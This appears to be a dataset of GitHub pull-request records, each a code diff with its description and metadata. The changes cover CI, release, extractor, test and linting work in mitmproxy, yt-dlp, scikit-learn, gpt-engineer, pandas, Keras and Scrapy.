+++ b/.github/workflows/main.yml
@@ -178,7 +178,11 @@ jobs:
# Separate from everything else because slow.
build-and-deploy-docker:
- if: github.repository == 'mitmproxy/mitmproxy' && (github.ref == 'refs/heads/main' || github.ref == 'refs/heads/dockertest')
+ if: github.repository == 'mitmproxy/mitmproxy' && (
+ github.ref == 'refs/heads/main' ||
+ github.ref == 'refs/heads/dockertest' ||
+ startsWith(github.ref, 'refs/tags/')
+ )
environment: deploy-docker
needs:
- test
diff --git a/release/README.md b/release/README.md
index 1f1644550a..fbb6820d6c 100644
--- a/release/README.md
+++ b/release/README.md
@@ -40,9 +40,9 @@ These steps assume you are on the correct branch and have a git remote called `o
### Docs
-- `./build.sh`. If everything looks alright, continue with
+- `./build.py`. If everything looks alright, continue with
- `./upload-stable.sh`,
-- `DOCS_ARCHIVE=true ./build.sh`, and
+- `DOCS_ARCHIVE=true ./build.py`, and
- `./upload-archive.sh v4`. Doing this now already saves you from switching back to an old state on the next release.
### Website
diff --git a/release/cibuild.py b/release/cibuild.py
index 0bbfdff26c..0ad958dbfa 100755
--- a/release/cibuild.py
+++ b/release/cibuild.py
@@ -541,8 +541,14 @@ def upload(): # pragma: no cover
], cwd=docker_build_dir)
if be.is_prod_release:
- subprocess.check_call(["docker", "tag", be.docker_tag, "mitmproxy/mitmproxy:latest"])
- subprocess.check_call(["docker", "push", "mitmproxy/mitmproxy:latest"])
+ subprocess.check_call([
+ "docker", "buildx", "build",
+ "--tag", "mitmproxy/mitmproxy:latest",
+ "--push",
+ "--platform", DOCKER_PLATFORMS,
+ "--build-arg", f"MITMPROXY_WHEEL={whl.name}",
+ "."
+ ], cwd=docker_build_dir)
if __name__ == "__main__": # pragma: no cover
diff --git a/release/deploy.py b/release/deploy.py
index 6e60e3f5d3..9363109dd5 100755
--- a/release/deploy.py
+++ b/release/deploy.py
@@ -1,8 +1,10 @@
#!/usr/bin/env python3
import os
+import re
import subprocess
from pathlib import Path
from typing import Optional
+# Security: No third-party dependencies here!
if __name__ == "__main__":
ref = os.environ["GITHUB_REF"]
@@ -17,7 +19,8 @@
# Upload binaries (be it release or snapshot)
if tag:
- upload_dir = tag
+ # remove "v" prefix from version tags.
+ upload_dir = re.sub(r"^v([\d.]+)$", r"\1", tag)
else:
upload_dir = f"branches/{branch}"
subprocess.check_call([
| This PR fixes the issues described in #4685. | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/4690 | 2021-07-19T09:20:28Z | 2021-07-19T11:20:09Z | 2021-07-19T11:20:08Z | 2021-07-19T11:20:11Z | 794 | mitmproxy/mitmproxy | 27,869 |
[SkyNewsAU] Add extractor | diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index 6bc9a2b1eb7..77ded69263b 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -1281,6 +1281,7 @@
SkyNewsArabiaIE,
SkyNewsArabiaArticleIE,
)
+from .skynewsau import SkyNewsAUIE
from .sky import (
SkyNewsIE,
SkySportsIE,
diff --git a/yt_dlp/extractor/skynewsau.py b/yt_dlp/extractor/skynewsau.py
new file mode 100644
index 00000000000..b1d77951e77
--- /dev/null
+++ b/yt_dlp/extractor/skynewsau.py
@@ -0,0 +1,46 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+from .common import InfoExtractor
+from ..utils import (
+ try_get,
+ unified_strdate,
+)
+
+
+class SkyNewsAUIE(InfoExtractor):
+ _VALID_URL = r'(?:https?://)(?:www\.)?skynews\.com\.au/[^/]+/[^/]+/[^/]+/video/(?P<id>[a-z0-9]+)'
+
+ _TESTS = [{
+ 'url': 'https://www.skynews.com.au/world-news/united-states/incredible-vision-shows-lava-overflowing-from-spains-la-palma-volcano/video/0f4c6243d6903502c01251f228b91a71',
+ 'info_dict': {
+ 'id': '6277184925001',
+ 'ext': 'mp4',
+ 'title': 'md5:60594f1ea6d5ae93e292900f4d34e9ae',
+ 'description': 'md5:60594f1ea6d5ae93e292900f4d34e9ae',
+ 'thumbnail': r're:^https?://.*\.jpg',
+ 'duration': 76.394,
+ 'timestamp': 1634271300,
+ 'uploader_id': '5348771529001',
+ 'tags': ['fblink', 'msn', 'usa', 'world', 'yt'],
+ 'upload_date': '20211015',
+ },
+ 'params': {'skip_download': True, 'format': 'bv'}
+ }]
+
+ _API_KEY = '6krsj3w249nk779d8fukqx9f'
+
+ def _real_extract(self, url):
+ id = self._match_id(url)
+ webpage = self._download_webpage(url, id)
+ embedcode = self._search_regex(r'embedcode\s?=\s?\"([^\"]+)\"', webpage, 'embedcode')
+ data_json = self._download_json(
+ f'https://content.api.news/v3/videos/brightcove/{embedcode}?api_key={self._API_KEY}', id)['content']
+ return {
+ 'id': id,
+ '_type': 'url_transparent',
+ 'url': 'https://players.brightcove.net/%s/default_default/index.html?videoId=%s' % tuple(embedcode.split('-')),
+ 'ie_key': 'BrightcoveNew',
+ 'title': data_json.get('caption'),
+ 'upload_date': unified_strdate(try_get(data_json, lambda x: x['date']['created'])),
+ }
| ## Please follow the guide below
- You will be asked some questions; please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like this: [x])
- Use the *Preview* tab to see what your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [ ] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [ ] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [ ] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Closes https://github.com/yt-dlp/yt-dlp/issues/1287
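
A minimal, hedged usage sketch: the URL below is the test URL from the new extractor's `_TESTS` entry, and the `YoutubeDL` Python embedding API shown here is standard yt-dlp usage rather than something added by this PR.

```python
from yt_dlp import YoutubeDL

# Test URL taken from the _TESTS entry of the new SkyNewsAUIE extractor.
url = (
    "https://www.skynews.com.au/world-news/united-states/"
    "incredible-vision-shows-lava-overflowing-from-spains-la-palma-volcano/"
    "video/0f4c6243d6903502c01251f228b91a71"
)

with YoutubeDL({"skip_download": True}) as ydl:
    info = ydl.extract_info(url, download=False)
    print(info["id"], info.get("title"))
```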
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/1308 | 2021-10-16T15:50:56Z | 2021-10-18T02:39:50Z | 2021-10-18T02:39:50Z | 2021-10-21T16:36:29Z | 823 | yt-dlp/yt-dlp | 7,365 |
[MRG] Allow scoring of dummies without testsamples | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 2ed336b782174..3866f5c611499 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -291,6 +291,10 @@ Support for Python 3.3 has been officially dropped.
only require X to be an object with finite length or shape. :issue:`9832` by
:user:`Vrishank Bhardwaj <vrishank97>`.
+- |Feature| :class:`dummy.DummyClassifier` and :class:`dummy.DummyRegressor`
+ can now be scored without supplying test samples.
+ :issue:`11951` by :user:`Rüdiger Busche <JarnoRFB>`.
+
:mod:`sklearn.ensemble`
.......................
diff --git a/sklearn/dummy.py b/sklearn/dummy.py
index f2c866413183b..de183893f1edb 100644
--- a/sklearn/dummy.py
+++ b/sklearn/dummy.py
@@ -318,6 +318,37 @@ def predict_log_proba(self, X):
else:
return [np.log(p) for p in proba]
+ def score(self, X, y, sample_weight=None):
+ """Returns the mean accuracy on the given test data and labels.
+
+ In multi-label classification, this is the subset accuracy
+ which is a harsh metric since you require for each sample that
+ each label set be correctly predicted.
+
+ Parameters
+ ----------
+ X : {array-like, None}
+ Test samples with shape = (n_samples, n_features) or
+ None. Passing None as test samples gives the same result
+ as passing real test samples, since DummyClassifier
+ operates independently of the sampled observations.
+
+ y : array-like, shape = (n_samples) or (n_samples, n_outputs)
+ True labels for X.
+
+ sample_weight : array-like, shape = [n_samples], optional
+ Sample weights.
+
+ Returns
+ -------
+ score : float
+ Mean accuracy of self.predict(X) wrt. y.
+
+ """
+ if X is None:
+ X = np.zeros(shape=(len(y), 1))
+ return super(DummyClassifier, self).score(X, y, sample_weight)
+
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
@@ -478,3 +509,41 @@ def predict(self, X, return_std=False):
y_std = np.ravel(y_std)
return (y, y_std) if return_std else y
+
+ def score(self, X, y, sample_weight=None):
+ """Returns the coefficient of determination R^2 of the prediction.
+
+ The coefficient R^2 is defined as (1 - u/v), where u is the residual
+ sum of squares ((y_true - y_pred) ** 2).sum() and v is the total
+ sum of squares ((y_true - y_true.mean()) ** 2).sum().
+ The best possible score is 1.0 and it can be negative (because the
+ model can be arbitrarily worse). A constant model that always
+ predicts the expected value of y, disregarding the input features,
+ would get a R^2 score of 0.0.
+
+ Parameters
+ ----------
+ X : {array-like, None}
+ Test samples with shape = (n_samples, n_features) or None.
+ For some estimators this may be a
+ precomputed kernel matrix instead, shape = (n_samples,
+ n_samples_fitted], where n_samples_fitted is the number of
+ samples used in the fitting for the estimator.
+ Passing None as test samples gives the same result
+ as passing real test samples, since DummyRegressor
+ operates independently of the sampled observations.
+
+ y : array-like, shape = (n_samples) or (n_samples, n_outputs)
+ True values for X.
+
+ sample_weight : array-like, shape = [n_samples], optional
+ Sample weights.
+
+ Returns
+ -------
+ score : float
+ R^2 of self.predict(X) wrt. y.
+ """
+ if X is None:
+ X = np.zeros(shape=(len(y), 1))
+ return super(DummyRegressor, self).score(X, y, sample_weight)
diff --git a/sklearn/tests/test_dummy.py b/sklearn/tests/test_dummy.py
index 5d955f51017a1..805c90a7e018e 100644
--- a/sklearn/tests/test_dummy.py
+++ b/sklearn/tests/test_dummy.py
@@ -1,5 +1,7 @@
from __future__ import division
+import pytest
+
import numpy as np
import scipy.sparse as sp
@@ -200,6 +202,45 @@ def test_string_labels():
assert_array_equal(clf.predict(X), ["paris"] * 5)
+@pytest.mark.parametrize("y,y_test", [
+ ([2, 1, 1, 1], [2, 2, 1, 1]),
+ (np.array([[2, 2],
+ [1, 1],
+ [1, 1],
+ [1, 1]]),
+ np.array([[2, 2],
+ [2, 2],
+ [1, 1],
+ [1, 1]]))
+])
+def test_classifier_score_with_None(y, y_test):
+ clf = DummyClassifier(strategy="most_frequent")
+ clf.fit(None, y)
+ assert_equal(clf.score(None, y_test), 0.5)
+
+
+@pytest.mark.parametrize("strategy", [
+ "stratified",
+ "most_frequent",
+ "prior",
+ "uniform",
+ "constant"
+])
+def test_classifier_prediction_independent_of_X(strategy):
+ y = [0, 2, 1, 1]
+ X1 = [[0]] * 4
+ clf1 = DummyClassifier(strategy=strategy, random_state=0, constant=0)
+ clf1.fit(X1, y)
+ predictions1 = clf1.predict(X1)
+
+ X2 = [[1]] * 4
+ clf2 = DummyClassifier(strategy=strategy, random_state=0, constant=0)
+ clf2.fit(X2, y)
+ predictions2 = clf2.predict(X2)
+
+ assert_array_equal(predictions1, predictions2)
+
+
def test_classifier_exceptions():
clf = DummyClassifier(strategy="unknown")
assert_raises(ValueError, clf.fit, [], [])
@@ -633,3 +674,39 @@ def test_dummy_regressor_return_std():
assert_equal(len(y_pred_list), 2)
# the second element should be all zeros
assert_array_equal(y_pred_list[1], y_std_expected)
+
+
+@pytest.mark.parametrize("y,y_test", [
+ ([1, 1, 1, 2], [1.25] * 4),
+ (np.array([[2, 2],
+ [1, 1],
+ [1, 1],
+ [1, 1]]),
+ [[1.25, 1.25]] * 4)
+
+])
+def test_regressor_score_with_None(y, y_test):
+ reg = DummyRegressor()
+ reg.fit(None, y)
+ assert_equal(reg.score(None, y_test), 1.0)
+
+
+@pytest.mark.parametrize("strategy", [
+ "mean",
+ "median",
+ "quantile",
+ "constant"
+])
+def test_regressor_prediction_independent_of_X(strategy):
+ y = [0, 2, 1, 1]
+ X1 = [[0]] * 4
+ reg1 = DummyRegressor(strategy=strategy, constant=0, quantile=0.7)
+ reg1.fit(X1, y)
+ predictions1 = reg1.predict(X1)
+
+ X2 = [[1]] * 4
+ reg2 = DummyRegressor(strategy=strategy, constant=0, quantile=0.7)
+ reg2.fit(X2, y)
+ predictions2 = reg2.predict(X2)
+
+ assert_array_equal(predictions1, predictions2)
 | As DummyClassifier and DummyRegressor operate solely on the targets,
they can now be scored without passing test samples: `None` may be passed in place of `X`.
Also includes some minor renaming in the corresponding tests for more consistency.
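
A minimal sketch of the new behaviour, mirroring the tests added in this PR (the strategies, targets, and expected scores are the ones used in `test_classifier_score_with_None` and `test_regressor_score_with_None`):

```python
from sklearn.dummy import DummyClassifier, DummyRegressor

# The dummy estimators ignore X entirely, so None is accepted in place of
# the test samples when calling score().
clf = DummyClassifier(strategy="most_frequent")
clf.fit(None, [2, 1, 1, 1])
print(clf.score(None, [2, 2, 1, 1]))  # 0.5

reg = DummyRegressor()
reg.fit(None, [1, 1, 1, 2])
print(reg.score(None, [1.25] * 4))    # 1.0
```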
#### Reference Issues/PRs
Resolves #11951
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/11957 | 2018-08-31T13:45:19Z | 2018-09-13T08:04:00Z | 2018-09-13T08:04:00Z | 2018-09-13T08:44:30Z | 1,897 | scikit-learn/scikit-learn | 46,712 |
Revert "add support for anthropic, azure, aleph alpha, ai21, togetherai, cohere, replicate, huggingface inference endpoints, etc. " | diff --git a/.env.template b/.env.template
index 61e0b462e8..8315b6151a 100644
--- a/.env.template
+++ b/.env.template
@@ -2,15 +2,3 @@
# OPENAI_API_KEY=Your personal OpenAI API key from https://platform.openai.com/account/api-keys
OPENAI_API_KEY=$key
-
-# LiteLLM support models: Huggingface, Cohere, Replicate, Aleph Alpha, TogetherAI and more - https://docs.litellm.ai/docs/completion/supported
-AI21_API_KEY=""
-ANTHROPIC_API_KEY=""
-TOGETHERAI_API_KEY=""
-ALEPH_ALPHA_API_KEY=""
-HUGGINGFACE_API_KEY=""
-COHERE_API_KEY=""
-REPLICATE_API_KEY=""
-AZURE_API_BASE = ""
-AZURE_API_KEY = ""
-AZURE_API_VERSION = ""
\ No newline at end of file
diff --git a/gpt_engineer/ai.py b/gpt_engineer/ai.py
index 940d57eb35..db58d943f4 100644
--- a/gpt_engineer/ai.py
+++ b/gpt_engineer/ai.py
@@ -2,8 +2,7 @@
import json
import logging
-import os
-import litellm
+
from dataclasses import dataclass
from typing import List, Optional, Union
@@ -11,7 +10,7 @@
import tiktoken
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
-from langchain.chat_models import AzureChatOpenAI, ChatOpenAI, ChatLiteLLM
+from langchain.chat_models import AzureChatOpenAI, ChatOpenAI
from langchain.chat_models.base import BaseChatModel
from langchain.schema import (
AIMessage,
@@ -356,7 +355,6 @@ def create_chat_model(self, model: str, temperature) -> BaseChatModel:
BaseChatModel
The created chat model.
"""
- model = "j2-mid"
if self.azure_endpoint:
return AzureChatOpenAI(
openai_api_base=self.azure_endpoint,
@@ -365,12 +363,6 @@ def create_chat_model(self, model: str, temperature) -> BaseChatModel:
openai_api_type="azure",
streaming=True,
)
- elif model in litellm.model_list or model.split("/", 1)[0] in litellm.provider_list:
- return ChatLiteLLM(
- model=model,
- temperature=temperature,
- streaming=True,
- )
# Fetch available models from OpenAI API
supported = [model["id"] for model in openai.Model.list()["data"]]
if model not in supported:
diff --git a/pyproject.toml b/pyproject.toml
index 89ebd11774..fbafd9bc9a 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -22,7 +22,6 @@ dependencies = [
'tiktoken >=0.0.4',
'tabulate == 0.9.0',
'python-dotenv >= 0.21.0',
- 'litellm == 0.1.518',
'langchain >=0.0.240',
]
| Reverts AntonOsika/gpt-engineer#660 | https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/685 | 2023-09-07T20:05:19Z | 2023-09-07T20:05:25Z | 2023-09-07T20:05:25Z | 2023-09-07T20:05:29Z | 712 | gpt-engineer-org/gpt-engineer | 33,160 |
CI: replace flake8-pyi with ruff | diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 02acba4804eb3..d4baa638bdda2 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -28,7 +28,7 @@ repos:
types_or: [python, pyi]
additional_dependencies: [black==23.1.0]
- repo: https://github.com/charliermarsh/ruff-pre-commit
- rev: v0.0.255
+ rev: v0.0.259
hooks:
- id: ruff
args: [--exit-non-zero-on-fix]
@@ -392,14 +392,6 @@ repos:
files: ^pandas/
exclude: ^(pandas/_libs/|pandas/tests/|pandas/errors/__init__.py$|pandas/_version.py)
types: [python]
- - id: flake8-pyi
- name: flake8-pyi
- entry: flake8 --extend-ignore=E301,E302,E305,E701,E704
- types: [pyi]
- language: python
- additional_dependencies:
- - flake8==5.0.4
- - flake8-pyi==22.8.1
- id: future-annotations
name: import annotations from __future__
entry: 'from __future__ import annotations'
diff --git a/pyproject.toml b/pyproject.toml
index da831dc9f8bd4..2aadfd7bd41ef 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -215,6 +215,8 @@ select = [
"PLE", "PLR", "PLW",
# misc lints
"PIE",
+ # flake8-pyi
+ "PYI",
# tidy imports
"TID",
# implicit string concatenation
@@ -266,6 +268,14 @@ ignore = [
"PLR0915",
# Global statements are discouraged
"PLW0603",
+ # Docstrings should not be included in stubs
+ "PYI021",
+ # Use typing_extensions.TypeAlias for type aliases
+ # "PYI026", # not yet implemented
+ # Use "collections.abc.*" instead of "typing.*" (PEP 585 syntax)
+ # "PYI027", # not yet implemented
+ # while int | float can be shortened to float, the former is more explicit
+ # "PYI041", # not yet implemented
# Additional checks that don't pass yet
# Within an except clause, raise exceptions with ...
@@ -281,6 +291,8 @@ exclude = [
"doc/build/*.py",
"doc/temp/*.py",
".eggs/*.py",
+ # vendored files
+ "pandas/util/version/*",
"versioneer.py",
# exclude asv benchmark environments from linting
"env",
@@ -292,8 +304,9 @@ exclude = [
# to be enabled gradually
"pandas/core/*" = ["PLR5501", "PLW2901"]
"pandas/io/*" = ["PLW2901"]
-"pandas/tests/*" = ["PLW2901"]
+"pandas/tests/*" = ["B028", "PLW2901"]
"pandas/plotting/*" = ["PLW2901"]
+"scripts/*" = ["B028"]
# Keep this one enabled
"pandas/_typing.py" = ["TCH"]
diff --git a/setup.cfg b/setup.cfg
index f27daa56cbfc6..c269237f97211 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,7 +1,7 @@
[flake8]
max-line-length = 88
# Although ruff is now the main linter for style checks, this section
-# is still needed for validate_docstrings.py and flake8-pyi
+# is still needed for validate_docstrings.py
ignore =
# space before : (needed for how black formats slicing)
E203,
@@ -12,17 +12,7 @@ ignore =
# module level import not at top of file
E402,
# do not assign a lambda expression, use a def
- E731,
- # found modulo formatter (incorrect picks up mod operations)
- Y002,
- # Docstrings should not be included in stubs
- Y021,
- # Use typing_extensions.TypeAlias for type aliases
- Y026,
- # Use "collections.abc.*" instead of "typing.*" (PEP 585 syntax)
- Y027,
- # while int | float can be shortened to float, the former is more explicit
- Y041
+ E731
exclude =
doc/sphinxext/*.py,
doc/build/*.py,
| Not all rules are covered by ruff but, from my point of view, the important ones are covered. | https://api.github.com/repos/pandas-dev/pandas/pulls/52226 | 2023-03-26T17:26:31Z | 2023-03-26T19:34:59Z | 2023-03-26T19:34:59Z | 2023-08-09T15:08:36Z | 1,102 | pandas-dev/pandas | 45,453 |
Fix `MapCoordinates` class and Add Tests for Uncovered Areas in `keras/ops/image.py` | diff --git a/keras/ops/image.py b/keras/ops/image.py
index 715bbe0aeaa..1edc9ea594a 100644
--- a/keras/ops/image.py
+++ b/keras/ops/image.py
@@ -515,7 +515,7 @@ def _extract_patches(
class MapCoordinates(Operation):
- def __init__(self, order, fill_mode="constant", fill_value=0):
+ def __init__(self, order=1, fill_mode="constant", fill_value=0):
super().__init__()
self.order = order
self.fill_mode = fill_mode
diff --git a/keras/ops/image_test.py b/keras/ops/image_test.py
index e16cc21351c..2f8b24a3e1e 100644
--- a/keras/ops/image_test.py
+++ b/keras/ops/image_test.py
@@ -602,3 +602,157 @@ def test_crop_images(
backend.convert_to_numpy(cropped_image),
atol=1e-5,
)
+
+ def test_rgb_to_grayscale_invalid_rank_two_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ invalid_image = np.random.uniform(size=(10, 10))
+ with self.assertRaisesRegex(
+ ValueError,
+ "Invalid image rank: expected rank 3",
+ ):
+ rgb_to_gray.compute_output_spec(invalid_image)
+
+ def test_rgb_to_grayscale_invalid_rank_five_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ invalid_image = np.random.uniform(size=(2, 3, 10, 10, 3))
+ with self.assertRaisesRegex(
+ ValueError,
+ "Invalid image rank: expected rank 3",
+ ):
+ rgb_to_gray.compute_output_spec(invalid_image)
+
+ def test_rgb_to_grayscale_valid_rank_three_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ valid_image = np.random.uniform(size=(10, 10, 3))
+ output_spec = rgb_to_gray.compute_output_spec(valid_image)
+ self.assertEqual(
+ output_spec.shape,
+ (10, 10, 1),
+ "Output shape should match expected grayscale image shape",
+ )
+
+ def test_rgb_to_grayscale_valid_rank_four_tensor(self):
+ rgb_to_gray = kimage.RGBToGrayscale()
+ valid_image = np.random.uniform(size=(5, 10, 10, 3))
+ output_spec = rgb_to_gray.compute_output_spec(valid_image)
+ self.assertEqual(
+ output_spec.shape,
+ (5, 10, 10, 1),
+ "Output shape should match expected grayscale image shape",
+ )
+
+ def test_affine_transform_compute_output_spec_image_rank_too_low(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with an image of rank 2 (invalid)
+ image_2d = np.random.uniform(size=(10, 10))
+ transform_valid = np.random.uniform(size=(6,))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid image rank: expected rank 3"
+ ):
+ affine_transform.compute_output_spec(image_2d, transform_valid)
+
+ def test_affine_transform_compute_output_spec_image_rank_too_high(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with an image of rank 5 (invalid)
+ image_5d = np.random.uniform(size=(2, 10, 10, 3, 1))
+ transform_valid = np.random.uniform(size=(6,))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid image rank: expected rank 3"
+ ):
+ affine_transform.compute_output_spec(image_5d, transform_valid)
+
+ def test_affine_transform_compute_output_spec_transform_rank_too_high(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with a valid image rank 3
+ image_valid = np.random.uniform(size=(10, 10, 3))
+ # Test with a transform of rank 3 (invalid)
+ transform_invalid_rank3 = np.random.uniform(size=(2, 3, 2))
+ with self.assertRaisesRegex(
+ ValueError, "Invalid transform rank: expected rank 1"
+ ):
+ affine_transform.compute_output_spec(
+ image_valid, transform_invalid_rank3
+ )
+
+ def test_affine_transform_compute_output_spec_transform_rank_too_low(self):
+ affine_transform = kimage.AffineTransform()
+ # Test with a valid image rank 3
+ image_valid = np.random.uniform(size=(10, 10, 3))
+ # Test with a transform of rank 0 (invalid)
+ transform_invalid_rank0 = np.random.uniform(size=())
+ with self.assertRaisesRegex(
+ ValueError, "Invalid transform rank: expected rank 1"
+ ):
+ affine_transform.compute_output_spec(
+ image_valid, transform_invalid_rank0
+ )
+
+ def test_extract_patches_with_invalid_tuple_size(self):
+ size = (3, 3, 3) # Invalid size, too many dimensions
+ image = np.random.uniform(size=(2, 20, 20, 3))
+ with self.assertRaisesRegex(
+ TypeError, "Expected an int or a tuple of length 2"
+ ):
+ kimage.extract_patches(image, size)
+
+ def test_extract_patches_with_incorrect_type_size(self):
+ size = "5" # Invalid size type
+ image = np.random.uniform(size=(2, 20, 20, 3))
+ with self.assertRaisesRegex(
+ TypeError, "Expected an int or a tuple of length 2"
+ ):
+ kimage.extract_patches(image, size)
+
+ def test_extract_patches_with_integer_size(self):
+ size = 5
+ # Use float32 for compatibility with TensorFlow convolution operations
+ image = np.random.uniform(size=(1, 20, 20, 3)).astype(np.float32)
+ patches = kimage.extract_patches(image, size)
+ # Expecting 4x4 patches with each patch having 75 values (5x5x3)
+ expected_shape = (1, 4, 4, 75)
+ self.assertEqual(patches.shape, expected_shape)
+
+ def test_extract_patches_with_tuple_size(self):
+ size = (5, 5)
+ image = np.random.uniform(size=(1, 20, 20, 3)).astype(np.float32)
+ patches = kimage.extract_patches(image, size)
+ # Expecting 4x4 patches with each patch having 75 values (5x5x3)
+ expected_shape = (1, 4, 4, 75)
+ self.assertEqual(patches.shape, expected_shape)
+
+ def test_map_coordinates_image_coordinates_rank_mismatch(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(2, 10, 10))
+ with self.assertRaisesRegex(
+ ValueError, "must be the same as the rank of `image`"
+ ):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_image_coordinates_rank_mismatch_order_zero(self):
+ map_coordinates = kimage.MapCoordinates(order=0)
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(2, 10, 10))
+ with self.assertRaisesRegex(
+ ValueError, "must be the same as the rank of `image`"
+ ):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_coordinates_rank_too_low(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(3,))
+ with self.assertRaisesRegex(ValueError, "expected at least rank 2"):
+ map_coordinates.compute_output_spec(image, coordinates)
+
+ def test_map_coordinates_valid_input(self):
+ map_coordinates = kimage.MapCoordinates()
+ image = np.random.uniform(size=(10, 10, 3))
+ coordinates = np.random.uniform(size=(3, 10, 10))
+ output_spec = map_coordinates.compute_output_spec(image, coordinates)
+ expected_shape = (10, 10)
+ self.assertEqual(
+ output_spec.shape,
+ expected_shape,
+ "Output shape should be correct for valid inputs",
+ )
| This PR addresses a
`TypeError: MapCoordinates.__init__() missing 1 required positional argument: 'order'`
in `MapCoordinates` by adding a default `order=1` in the constructor.
Tests for previously uncovered areas in `ops/image.py` are also included for better coverage.
---
**Note:**
We default to `order=1` (linear interpolation), which is more commonly used in practice and is usually the preferred choice because it produces smoother results than `order=0` (nearest-neighbor interpolation).
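
For illustration, a minimal sketch of the fixed behaviour, using the same shapes and the same `kimage` alias as `test_map_coordinates_valid_input` above (it assumes `keras.ops.image` can be imported that way, as the tests do):

```python
import numpy as np
from keras.ops import image as kimage

image = np.random.uniform(size=(10, 10, 3))
coordinates = np.random.uniform(size=(3, 10, 10))

# Before this fix, MapCoordinates() raised a TypeError because `order` had
# no default; it now falls back to order=1 (linear interpolation).
op = kimage.MapCoordinates()  # equivalent to MapCoordinates(order=1)
spec = op.compute_output_spec(image, coordinates)
print(spec.shape)  # (10, 10)
```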
---
**Changes Made:**
- Added default `order=1` to `MapCoordinates` constructor.
- Included tests for uncovered areas in `ops/image.py`.
| https://api.github.com/repos/keras-team/keras/pulls/19507 | 2024-04-14T10:45:16Z | 2024-04-14T16:49:03Z | 2024-04-14T16:49:03Z | 2024-04-14T16:49:07Z | 1,906 | keras-team/keras | 47,859 |
Remove deprecated CrawlerRunner.spiders. | diff --git a/scrapy/crawler.py b/scrapy/crawler.py
index c5b3e19036b..bc0ab02df27 100644
--- a/scrapy/crawler.py
+++ b/scrapy/crawler.py
@@ -204,16 +204,6 @@ def __init__(self, settings: Union[Dict[str, Any], Settings, None] = None):
self._active: Set[defer.Deferred] = set()
self.bootstrap_failed = False
- @property
- def spiders(self):
- warnings.warn(
- "CrawlerRunner.spiders attribute is renamed to "
- "CrawlerRunner.spider_loader.",
- category=ScrapyDeprecationWarning,
- stacklevel=2,
- )
- return self.spider_loader
-
def crawl(self, crawler_or_spidercls, *args, **kwargs):
"""
Run a crawler with the provided arguments.
diff --git a/tests/test_crawler.py b/tests/test_crawler.py
index f99606ccfcd..4c5c48e6df2 100644
--- a/tests/test_crawler.py
+++ b/tests/test_crawler.py
@@ -20,7 +20,6 @@
from scrapy.settings import Settings, default_settings
from scrapy.spiderloader import SpiderLoader
from scrapy.utils.log import configure_logging, get_scrapy_root_handler
-from scrapy.utils.misc import load_object
from scrapy.utils.spider import DefaultSpider
from scrapy.utils.test import get_crawler
from tests.mockserver import MockServer, get_mockserver_env
@@ -182,16 +181,6 @@ def test_crawler_runner_accepts_None(self):
runner = CrawlerRunner()
self.assertOptionIsDefault(runner.settings, "RETRY_ENABLED")
- def test_deprecated_attribute_spiders(self):
- with warnings.catch_warnings(record=True) as w:
- runner = CrawlerRunner(Settings())
- spiders = runner.spiders
- self.assertEqual(len(w), 1)
- self.assertIn("CrawlerRunner.spiders", str(w[0].message))
- self.assertIn("CrawlerRunner.spider_loader", str(w[0].message))
- sl_cls = load_object(runner.settings["SPIDER_LOADER_CLASS"])
- self.assertIsInstance(spiders, sl_cls)
-
class CrawlerProcessTest(BaseCrawlerTest):
def test_crawler_process_accepts_dict(self):
 | It was deprecated in the same release (1.0.0) in which it was added. | https://api.github.com/repos/scrapy/scrapy/pulls/6010 | 2023-08-10T19:09:36Z | 2023-08-11T08:41:05Z | 2023-08-11T08:41:05Z | 2023-10-18T07:55:06Z | 518 | scrapy/scrapy | 34,329 |
